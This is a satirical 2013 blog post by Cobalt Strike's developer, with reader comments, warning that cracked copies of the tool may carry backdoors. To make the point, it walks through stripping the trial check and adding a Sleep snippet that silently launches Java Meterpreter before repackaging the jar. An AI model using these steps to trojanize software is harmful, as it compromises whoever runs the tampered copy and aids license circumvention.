h1

How to crack Cobalt Strike AND backdoor it

September 5, 2013

You know you’ve made it (somewhere?) as a software developer, when people pirate your stuff.  From various searches, I see that several “cracked” versions of the Cobalt Strike trial exist. Since there’s interest in pirating Cobalt Strike, I’d like to speculate about which steps I would take to crack the Cobalt Strike trial and add a backdoor to it, prior to distribution on an unofficial site.

At its core, Cobalt Strike is a Java application. Java applications are packaged as .jar files. Jar files are complex. So complex, a major conference carried a talk on how to reverse engineer them in early 2012. I’ll skip the reference to this talk and point in the right direction: use unzip. The unzip tool uses a sophisticated algorithm based on LZ77 and Huffman coding. After unzip, all of the Cobalt Strike files will spill out:

extractcs

Java applications consist of .class files. These files do not represent the socio-economic status of the code. Rather, they are the compiled form of several .java files. Cobalt Strike is a strange beast of an application though. There are also several .sl files. These are Sleep files. Sleep is a simple scripting language I’ve worked on since 2002. I write in Sleep because I’m very efficient with it.

For the aspiring cracker, Sleep is a welcome sight. Its files do not ship in a compiled form. They’re available as plaintext inside of the application archive. A plaintext file requires a special tool, called a text editor, to change its content. I recommend notepad.exe or pico. Linux hackers may use WINE to run notepad.exe. Type:

wine notepad.exe

Knowing how to navigate code and find things is a key skill for an aspiring cracker. My favorite way to search through source code is grep.

grep -r "some string" .

To crack Cobalt Strike, look for a file that manages license information. The trial expired message is a good string to look for. One change, in one line of code, will make a trial that will never expire. Remember–this is a violation of the license agreement.

Why stop at removing the trial restriction? For those with the skills and insights in this post, it’s a few steps to crack Cobalt Strike and use it to distribute malware.

Here’s how to do it with Cobalt Strike:

1. Define a listener for Java Meterpreter. Go to Cobalt Strike -> Listeners and press Add. Listeners are Cobalt Strike’s concept of persistent Metasploit Framework handlers. Each time Cobalt Strike is run, the defined listeners automatically start.

2. Export a Java Meterpreter package. Go to Attacks -> Packages -> Java Application. Choose a listener and press Generate. Cobalt Strike makes it easy to export artifacts to use in social engineering attacks.

javameterp

3. Use unzip to extract the Java Meterpreter package into a folder.

4. cd to this folder and delete META-INF/MANIFEST.MF

5. Copy all of the Java Meterpreter files, unchanged, into the folder where the extracted Cobalt Strike lives.

jm

6. Add this code to the bottom of a .sl file:

fork({
   [metasploit.Payload main: $null];
});

This Sleep code will silently run Java Meterpreter in its own thread. Consult the Sleep manual for different ways to obfuscate this code.

backdoor

7. The opposite of unzip is zip. Use this program to package the extracted Cobalt Strike files into one zip file. The cracked trial filename should end in .jar.

Congratulations, a backdoored version of Cobalt Strike is now ready for distribution.

Cracked trials of Cobalt Strike trials are available on many websites. I have never downloaded one and I do not intend to. The process I went through in this post isn’t the only way to add a backdoor to an unofficial copy of Cobalt Strike.

There is a way to get a clean copy of Cobalt Strike though. Download a 21 day trial through the official website.

43 comments

  1. Needless to say, this is illegal. Bear this in mind before distributing a backdoored version of something. You could get backfired…


  2. This blog post sat in my queue for a long time. Awhile back, someone emailed me for support on a cracked version of Cobalt Strike. They couldn’t figure out how to untar a file with spaces in it and came to me, claiming that my instructions were bad. I warned them that downloading a cracked trial is dangerous because it could have a backdoor. Of course, nothing makes risk real, quite like demonstrating it–this is a core idea behind the Cobalt Strike product and it’s why I’m business, hence this post.

    Here’s an anonymized peek into this exchange:

    From: TarIsHard
    To: Raphael

    I have gone through the support but not knowing what is wrong.. below is command i use and error i got

    root@bt:~# tar zxvf root/cobaltstrike-trial.tgz
    tar: root/cobaltstrike-Cracked-For: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: BackTrack.tgz: Not found in archive
    tar: Exiting with failure status due to previous errors

    Kindly give me full guide to this.

    ~~~~~~

    From: Raphael
    To: TarIsHard

    If I’m not mistaken, you’re trying to extract:

    /root/cobaltstrike-Cracked-For-BackTrack.tgz

    I follow Google alerts on my product pretty regularly, I’ve never downloaded this modified version of Cobalt Strike, but my understanding is that it’s made available to get past my commercial and export restrictions. I can’t help you with this and you’re taking on a big risk running a modified version of Cobalt Strike that someone else made available. This hacked version of the software could damage your system or install malware. Not to mention, I’m a single member company–you’re trying to install a “cracked” version of my software AND you’re requesting support from me. Doesn’t this strike you as slightly… disrespectful?

    If I type:

    # tar zxvf root/cobaltstrike-Cracked-For BackTrack.tgz

    I get… the same exact output you pasted

    ~~~~~

    From: TarIsHard
    To: Raphael

    First of all i never deal in anything crack or bogus deal.

    I download your program and trying to run it on BackTrack 5 R3 as i stated before, but i keep getting problems then i send you email but it’s not helping.. then i google some help about it then i got this cobaltstrike-Cracked-For BackTrack.tgz.

    After trying many ways and couldn’t get it done, that is why i sent you the error i am getting.

    1. If i want to run crack or whatsoever you might call it, i don’t think i will be so dump to send it to you to help me with it

    2. Help you render is not working and i sent you another email stating what i have done and the ERRORS i keep getting..

    You can check my email [email protected] on your record, i registered to able to use your program.

    So now, i all i need from you to help me out to use the program before the 21 days runs out so i can see how it works so i can purchase after 21days


    • This is pretty funny, but I would think that people who can’t master tar aren’t exactly your target demographic anyway. ;)


    • Thank you so much for posting that exchange. Still laughing at how ‘not dump’ he is.

      But seriously, now that we’ve cracked your software, can TarIsHard and I come crash on your couch and eat all your food? WE ARE REGISTERED TO BE ABLE TO EAT YOUR FOOD.


  3. I laughed immensely at Linux hackers wanting to use notepad.exe and grep as an advanced form of code navigation.

    Good sense of humor.


    • Totally lost it there too!


    • But grep is awsome
      grep -o “sometext” -B 2 -A1 < <(cat myfile) | sed "s/hax/moarhax/g"

      ..
      what? People said cat | grep is bad


  4. So now we know that you’re pretty good in adding backdoors… And how do we know that you didn’t backdoor your “legal” version ? ;-) After this post I surely won’t download any of your software :-D


  5. Wow. Have people not gotten the memo that antivirus depends on a signature for something 1) only in the past AND 2) reported? I’ve witnessed malware attack production time and time again evade antivirus because the manufacturing of novel variants is immense. So it’s more or less worthless because it does about a 40% job.

    And then there’s clowns that run something from an unknown source, it’s game over… It would be safer for you to post your credit card numbers, passwords and keyboard log on Twitter. Not just that, you have to reinstall the OS and every app because it is impossible to provably “clean” an owned machine. That’s a day’s pay or productivity wiped out. What’s that worth to you?


  6. I cant stop laughing at the idea of using a cracked version of software where the very software can be used to compromise your system.

    Thanks for the amazing work!


  7. Well, you don’t need to download a cracked version, or extract the jar files to make Cobalt Strike run after the trial period expires. You can change a UNIX time stamp in ….. or simply remove the line, and you have 21 more days to play with it ;-)


    • Yes. :) We’ll leave that as an exercise to the reader.


  8. Is this some kind of joke? Requiring wine to run notepad on Linux? There’s like a million text editors for Linux. Java being complicated? Basic LZW compression considered witchcraft? Purely because this application is in Java makes things easier since there are byte code dis-assemblers available which more-or-less return the original source. Hell, that’s why there is a Youtube instruction video on how to remove your pathetic protection mechanism. You don’t even need to fork or use metasploit to install a “backdoor” in any application, you just need to insert code virtually anywhere. Sigh… I could crack this thing in my sleep. What, you just graduated straight from college or something? You sir, are a joke.


    • Thank you. I blog to put my ideas out there and get feedback. When someone as skilled as you comes to participate in the discussion it’s a true honor. I will look for these other text editors you mention. Also, I will study more on LZW–compression, right? If you email me, maybe you can help me strengthen my protection mechanism. I would like it to require at least two changes in the code to make the trial not expire. One line of code–anyone can do. But two! That requires twice as much effort. Again, I am humbled by your presence in my blog’s comment section. Thank you. Stay who you are!


    • You code, fail to grasp social cues indicating humor, and are needlessly combative.

      Congratulations on being a complete stereotype. Your neckbeard will be checked for ticks and you’ll be given some Mountain Dew on your way out.


      • ROFLMAO – lulz XD


    • Q: Is this some kind of joke?
      A: Yes


  9. Oh man.. all the butthurt little kids here… This article is clearly facetious. Anyone who has ever done RE knows that time-based trials are almost always incredibly easy to get around. If you need to pirate this software, it isn’t for you. Go home.

    Additionally, he’s pointing out that downloading cracked software is a pretty damn good way to get yourself owned.

    Come on people.


  10. Reading your post made me rofl so hard, so thx for the :D. When i clicked around and saw a host that looked familiar, another lol when i saw that your friend is my friend on irc, world is too small. :D And now with the comment replies, pure gold.

    Cya, stay good.


  11. LoL. You sir are a gentleman and a scholar! Bravo!


  12. Raphael

    You have made my day. This was one of the best smartass put downs I have read in a long time.

    lmao
    Matt


  13. Thanks for this very enlightening post. Unfortunately I’m running on Windows so I got stuck at ‘wine notepad.exe’. Can I get Wine for Windows? Thanks so much, Chris


    • Doh! Don’t worry… I’ll put these instructions on cvshub and give someone commit rights to post the Windows version. Thanks Chris!


      • Mine same trouble like user Chris haven’t. It is primary OS (operating system) display MS (mikrosoft) Windows Xp Sp3 (setvice pack). I downloaded VMWares and make the LINUX VM now I can login root but trying command “wine notepad.exe” to start crack program but command not found. Do you ever try with VM (virtual machinery)?? I like cracking but this one making me stuck. I have researching sleep and find bash (Bourne again shell) function like sleep(5) is that correct function to learn about sleep to crack CS (COBALT Strike)


    • You should install a program called “Cygwin” on your Windows system. This will create a Unix environment in which you can run “wine”. From there you should be able to run “notepad” on your Windows system.


      • Can there be method to use program like the wine crackers one notepad that included with MS (Microsoft) Windows Xp Sp3 (service pack). I am run out of memory (Ram) after hours to finally install the “Cygwin” and try to get VMWares (virual machinery) preparing LINUX GUEST.


  14. badass-MacBook-Pro% wine notepad.exe
    zsh: command not found: wine

    I find your cracking tutorial seriously lacking.

    —–

    lol enjoyed it immensely


  15. That’s nice.. I understand all that, but i’m lazy. Maybe your audience is someone else, but $3000 a user sounds ridiculously expensive to me. I think if you have a reasonably priced product; you don’t have many people using a cracked version.

    The folks who can blow insane amounts like $3000 a year on pentest software are large corporations, whose risk management/HR should seek out and terminate anyone caught facilitating the use of cracked software, and security consultants, who are out of business if they are caught with cracked software.

    The working set of people in the world who need pentest software is much larger than that; everything from folks with personal web servers, to small academic departments with no budget, and Nmap doesn’t cut it.

    I think you will see lots of signs of people cracking software; wherever the vendors’ have collected failed the public by leaving a ludicrously underserved security market.


    • Cobalt Strike is not a scanner for the small business with a single web server and a few Windows workstations. It’s a threat emulation tool for use by professional red teams and consultants.


      • Then for disabled professionals lazy or scared. All this is already separately. This is for youngsters and newbies


  16. Thanks R! You made my day. Especially your reply to the comments.


  17. Very, very funny. Sad to see how many people just can’t get the joke, though.


  18. The post was good; a couple of the replies by the absolutely clueless made it even better. Bravo.


  19. Oh my dear!
    I am not a gamer, but I do love your atitude! Hope you are doing well with
    your software.

    Even if I have been using linux for 20+ years, and unix 30+, there are still
    a few things to be learned: using notepad.exe, did not know that!
    I will trow my emacs away, a smashing good editor at last.

    Keep up with the good work!
    /im


  20. I am sure this is PR to put off people using a cracked version of your software. However not everyone can afford the cost of this software and after seeing the price myself I would take the risk of installing a backdoor over paying for it.


    • Pricing is an art unto itself. Cobalt Strike is priced fairly for the professionals who use it to do a job.


      • As compared to Metasploit Pro or Core Impact (both worthy competitors), the pricing on Cobalt Strike is a steal.


    • When you are spending hundreds of thousands of dollars to staff a pen test team, any tool, in particular one like Cobalt Strike, that makes the use of their time more efficient is something you have to consider. Renewing my teams CS licenses each year is a no-brainer (though then I have to deal with a true no-brainer, our acquisition system).


  21. Great post! Reminds me that I need to get around to writing my magnum opus: “Theoretical Physics for Dummies” sometime this year. Good luck, Raphael!


  22. All of this is already in metasploit set and Armitage. Here there is nothing new except that Bitcoin is in antivirus databases. Explain to me for what $ 2500?


    • Actually, the developer of Cobalt Strike builds lots of extra features to streamline the red-teaming process, such as custom covert channel payloads (beacon) and 2factor authentication bypass capability (browser pivoting), as well as other stuff like AV bypass and passive system profiling.



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 12,809 other followers